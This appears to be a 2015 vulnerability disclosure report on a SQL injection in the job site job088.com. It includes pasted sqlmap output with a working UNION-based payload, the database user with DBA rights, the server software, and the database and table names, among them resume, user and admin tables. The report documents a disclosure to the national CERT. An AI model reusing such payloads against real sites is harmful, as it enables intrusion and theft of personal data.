2015-06-29: 细节已通知厂商并且等待厂商处理中 2015-07-01: 厂商已经确认,细节仅向厂商公开 2015-07-11: 细节向核心白帽子及相关领域专家公开 2015-07-21: 细节向普通白帽子公开 2015-07-31: 细节向实习白帽子公开 2015-08-15: 细节向公众公开
RT
post注入
http://www.job088.com/jobsearch.php?areaid=*&edu=&exp=&job1=&job1_son=&keyword=&salary=&sex=&tid=611&type=注入点:areaid参数edu参数exp参数job1参数job_son参数keyword参数salary参数sex参数tid参数type参数
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: UNION query Title: Generic UNION query (random number) - 11 columns Payload: http://www.job088.com:80/jobsearch.php?areaid=-6908 UNION ALL SELECT 6991,CHAR(113)+CHAR(113)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(65)+CHAR(111)+CHAR(77)+CHAR(89)+CHAR(116)+CHAR(113)+CHAR(101)+CHAR(84)+CHAR(89)+CHAR(90)+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(118)+CHAR(113),6991,6991,6991,6991,6991,6991,6991,6991,6991-- 21=6 AND 983=983&edu=&exp=&job1=&job1_son=&keyword=&salary=&sex=&tid=611&type= Vector: UNION ALL SELECT 8528,[QUERY],8528,8528,8528,8528,8528,8528,8528,8528,8528-- ---web server operating system: Windowsweb application technology: PHP 5.2.6, ASP.NETback-end DBMS: Microsoft SQL Server 2005current user: 'hdadmin2013'current database: 'job0881'current user is DBA: Trueavailable databases [9]:[*] hdrc22[*] job0881[*] kf[*] master[*] model[*] msdb[*] ReportServerTempDB[*] tempdb[*] trainsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: UNION query Title: Generic UNION query (random number) - 11 columns Payload: http://www.job088.com:80/jobsearch.php?areaid=-6908 UNION ALL SELECT 6991,CHAR(113)+CHAR(113)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(65)+CHAR(111)+CHAR(77)+CHAR(89)+CHAR(116)+CHAR(113)+CHAR(101)+CHAR(84)+CHAR(89)+CHAR(90)+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(118)+CHAR(113),6991,6991,6991,6991,6991,6991,6991,6991,6991-- 21=6 AND 983=983&edu=&exp=&job1=&job1_son=&keyword=&salary=&sex=&tid=611&type= Vector: UNION ALL SELECT 4700,[QUERY],4700,4700,4700,4700,4700,4700,4700,4700,4700-- ---web server operating system: Windowsweb application technology: PHP 5.2.6, ASP.NETback-end DBMS: Microsoft SQL Server 2005Database: job0881[69 tables]+----------------------+| BUSINESS_SHOP || Customer || PERS_USER || RESUME_BASIC || RESUME_BASIC || RESUME_CERT || RESUME_HOPE || RESUME_PROJECT || RESUME_READ || RESUME_SKILL || RESUME_TRAIN || RESUME_WORK || USERID_JOB || advertise || article_images || article_images || bl || class_advertise || class_advertise || cmd || comid || company_job || company_job || dictionary || friendslink || gg || history || jobconfig14 || jobconfig14 || jobpost14 || jobpost14 || map || news_base || news_cont || p_record || pangolin_test_table || records || sms_date || sqlmapoutput || sumposition || systemc || town || user_message || userid_favorite || v_areas || v_bus || v_company_job1 || v_company_job_list || v_company_job_list || v_company_job_list || v_company_job_search || v_entCat || v_indCat || v_jobClass || v_news_base || v_news_base || v_news_image || v_news_type || v_proClass || v_resume_search || v_resume_search || v_userid_resume || wx_job || 个人信箱 || 个人资料 || 公司信箱 || 公司资料 || 招聘信息 || 管理员 |+----------------------+
大量数据,DBA权限,就不深入了
危害等级:中
漏洞Rank:8
确认时间:2015-07-01 09:26
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给广东分中心,由广东分中心后续协调网站管理单位处置。
暂无